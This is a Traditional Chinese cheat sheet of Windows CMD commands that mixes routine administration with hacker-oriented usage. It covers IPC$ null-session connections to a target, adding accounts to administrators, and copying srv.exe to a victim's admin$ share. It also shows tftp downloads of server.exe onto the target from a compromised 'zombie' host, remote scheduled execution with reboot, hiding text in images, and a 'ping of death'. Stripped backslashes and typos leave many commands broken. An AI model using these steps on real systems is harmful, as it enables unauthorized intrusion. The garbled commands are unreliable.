net use ipipc$ " " /user:" " 建立IPC空連結
net use ipipc$ "密碼" /user:"使用者名稱" 建立IPC非空連結
net use h: ipc$ "密碼" /user:"使用者名稱" 直接登陸後對映對方C:到本地為H:
net use h: ipc$ 登陸後對映對方C:到本地為H:
net use ipipc$ /del 刪除IPC連結
net use h: /del 刪除對映對方到原生的為H:的對映
net user 使用者名稱 密碼 /add 建立使用者
net user guest /active:yes 啟用guest使用者
net user 檢視有哪些使用者
net user 帳戶名 檢視帳戶的內容
net localgroup administrators 使用者名稱 /add 把「使用者」添加到管理員中使其具有管理員許可權
net start 檢視開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 停止某服務
net time 目標ip 檢視對方時間
net time 目標ip /set 設定本地電腦時間與「目標IP」主機的時間同步,加上參數/yes可取消確認資訊
net view 檢視本地區域網路內開啟了哪些共享
net view ip 檢視對方區域網路內開啟了哪些共享
net config 顯示系統網路設定
net logoff 斷開連線的共享
net pause 服務名 暫停某服務
net send ip "文本資訊" 向對方發資訊
net ver 區域網路內正在使用的網路連線型別和資訊
net share 檢視本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345 用guest使用者登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 檢視開啟了哪些埠,常用netstat -an
netstat -n 檢視埠的網路連線情況,常用netstat -an
netstat -v 檢視正在進行的工作
netstat -p 協定名 例:netstat -p tcq/ip 檢視某協定使用情況
netstat -s 檢視正在使用的所有協定使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可檢視對方最近登陸的使用者名稱
tracert -參數 ip(或電腦名) 跟蹤路由(封包),參數:「-w數位」用於設定超時間隔。
ping ip(或網域名稱) 向對方主機發送預設大小為32字節的數據,參數:「-l[空格]封包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的檔並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)檢視本地ip地址,ipconfig可用參數「/all」顯示全部配置資訊
tlist -t 以樹行列表顯示行程(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)
kill -F 行程名 加-F參數後強制結束某行程(為系統的附加工具,預設是沒有安裝的,在安裝目錄的Support/tools資料夾內)
del -F 檔名 加-F參數後就可刪除唯讀檔,/AR、/AH、/AS、/AA分別表示刪除唯讀、隱藏、系統、存檔檔,/A-R、/A-H、/A-S、/A-A表示刪除除唯讀、隱藏、系統、存檔以外的檔。例如「DEL/AR *.*」表示刪除當前目錄下所有唯讀檔,「DEL/A-S *.*」表示刪除當前目錄下除系統檔以外的所有檔
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和檔。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 碟符路徑要移動的檔名 存放移動檔的路徑移動後檔名 移動檔,用參數/y將取消確認移動目錄存在相同檔的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個檔並把不同之處輸出到3st.txt檔中,"> "和"> >" 是重新導向命令
at id號 開啟已註冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已註冊的計劃任務
at 檢視所有的計劃任務
at ip time 程式名(或一個命令) /r 在某時間執行對方某程式並重新啟動電腦
finger username @host 檢視最近有哪些使用者登陸
telnet ip 埠 遠和登陸伺服器,預設埠為23
open ip 連線到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑檔名1 路徑檔名2 /y 復制檔1到指定的目錄為檔2,用參數/y就同時取消確認你要覆寫一份現存目錄檔
copy c:srv.exe ipadmin$ 復制本地c:srv.exe到對方的admin下
copy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的檔,註:2st.txt檔頭要空三排,參數:/b指二進制檔,/a指ASCLL格式檔
copy ipadmin$svv.exe c: 或:copyipadmin$*.* 復制對方admini$共享下的srv.exe檔(所有檔)至本地C:
xcopy 要復制的檔或目錄樹 目標地址目錄名 復制檔和目錄樹,用參數/Y將不提示覆蓋相同檔
用參數/e才可連目錄下的子目錄一起復制到目標地址下。
tftp -i 自己IP(用肉機作彈板時這用肉機IP) get server.exe c:server.exe 登陸後,將「IP」的server.exe下載到目標主機c:server.exe 參數:-i指以二進制模式傳送,如傳送exe檔時用,如不加-i 則以ASCII模式(傳送文字檔案模式)進行傳送
tftp -i 對方IP put c:server.exe 登陸後,上傳本地c:server.exe至主機
ftp ip 埠 用於上傳檔至伺服器或進行檔操作,預設埠為21。bin指用二進制方式傳送(可執行檔進);預設為ASCII格式傳送(文字檔案時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網路遮罩Netmask,閘道器地址Gateway addres,介面地址Interface
arp 檢視和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部資訊
start 程式名或命令 /max 或/min 新開一個新視窗並最大化(最小化)執行某程式或命令
mem 檢視cpu使用情況
attrib 檔名(目錄名) 檢視某檔(目錄)的內容
attrib 檔名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某檔的 存檔,唯讀,系統,隱藏 內容;用+則是添加為某內容
dir 檢視檔,參數:/Q顯示檔及目錄屬系統哪個使用者,/T:C顯示檔建立時間,/T:A顯示檔上次被存取時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變量名稱=要指派給變量的字元 設定環境變量
set 顯示當前所有的環境變量
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變量
pause 暫停批處理常式,並顯示出:請按任意鍵繼續....
if 在批處理常式中執行條件處理(更多說明見if命令及變量)
goto 標簽 將cmd.exe導向到批處理常式中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑批次檔名 從批處理常式中呼叫另一個批處理常式 (更多說明見call /?)
for 對一組檔中的每一個檔執行某個特定命令(更多說明見for命令及變量)
echo on或off 開啟或關閉echo,僅用echo不加參數則顯示當前echo設定
echo 資訊 在螢幕上顯示出資訊
echo 資訊 >> pass.txt 將"資訊"保存到pass.txt檔中
findstr "Hello" aa.txt 在aa.txt檔中尋找字串hello
find 檔名 尋找某檔
title 標題名字 更改CMD視窗標題名字
color 顏色值 設定cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示字元(把C:、D:統一改為:EntSky )
二、ver 在DOS視窗下顯示版本資訊
winver 彈出一個視窗顯示版本資訊(記憶體大小、系統版本、修補程式版本、電腦名)
format 碟符 /FS:型別 格式化磁盤,型別:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 建立目錄
replace 原始檔 要替換檔的目錄 替換檔
ren 原檔名 新檔名 重新命名檔名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個資料夾中檔名稱
type 檔名 顯示文字檔案的內容
more 檔名 逐屏顯示輸出檔
doskey 要釘選的命令=字元
doskey 要解鎖命令= 為DOS提供的釘選命令(編輯命令列,重新呼叫win2k命令,並建立宏)。如:釘選dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
taskmgr 調出工作管理員
chkdsk /F D: 檢查磁盤D並顯示狀態報告;加參數/f並修復磁盤上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務預設埠23為其它任何埠
exit 結束cmd.exe程式或目前,用參數/B則是結束當前批次處理指令碼而不是cmd.exe
path 路徑可執行檔的檔名 為可執行檔設定一個路徑。
cmd 啟動一個win2K命令解釋視窗。參數:/eff、/en 關閉、開啟命令擴充套件;更我詳細說明見cmd /?
regedit /s 登錄檔檔名 匯入登錄檔;參數/S指安靜模式匯入,無任何提示;
regedit /e 登錄檔檔名 匯出登錄檔
cacls 檔名 參數 顯示或修改檔存取控制列表(ACL)——針對NTFS格式時。參數:/D 使用者名稱:設定拒絕某使用者存取;/P 使用者名稱:perm 替換指定使用者的存取許可權;/G 使用者名稱:perm 賦予指定使用者存取許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D: est.txt /D pub 設定d: est.txt拒絕pub使用者存取。
cacls 檔名 檢視檔的存取使用者許可權列表
REM 文本內容 在批次檔中添加註解
netsh 檢視或更改本地網路配置情況
shutdown /參數 關閉或重新開機本地或遠端主機。
參數說明:/S 關閉主機,/R 重新開機主機, /T 數位 設定延時的時間,範圍0~180秒之間, /A取消開機,/M //IP 指定的遠端主機。
例:shutdown /r /t 0 立即重新開機本地主機(無延時)
taskill /參數 行程名或行程的pid 終止一個或多個任務和行程。
參數說明:/PID 要終止行程的pid,可用tasklist命令獲得各行程的pid,/IM 要終止的行程的行程名,/F 強制終止行程,/T 終止指定的行程及他所啟動的子行程。
tasklist 顯示當前執行在本地和遠端主機上的行程、服務、服務各行程的行程識別元(PID)。
參數說明:/M 列出當前 行程載入的dll檔,/SVC 顯示出每個行程對應的服務,無參數時就只列出當前的行程。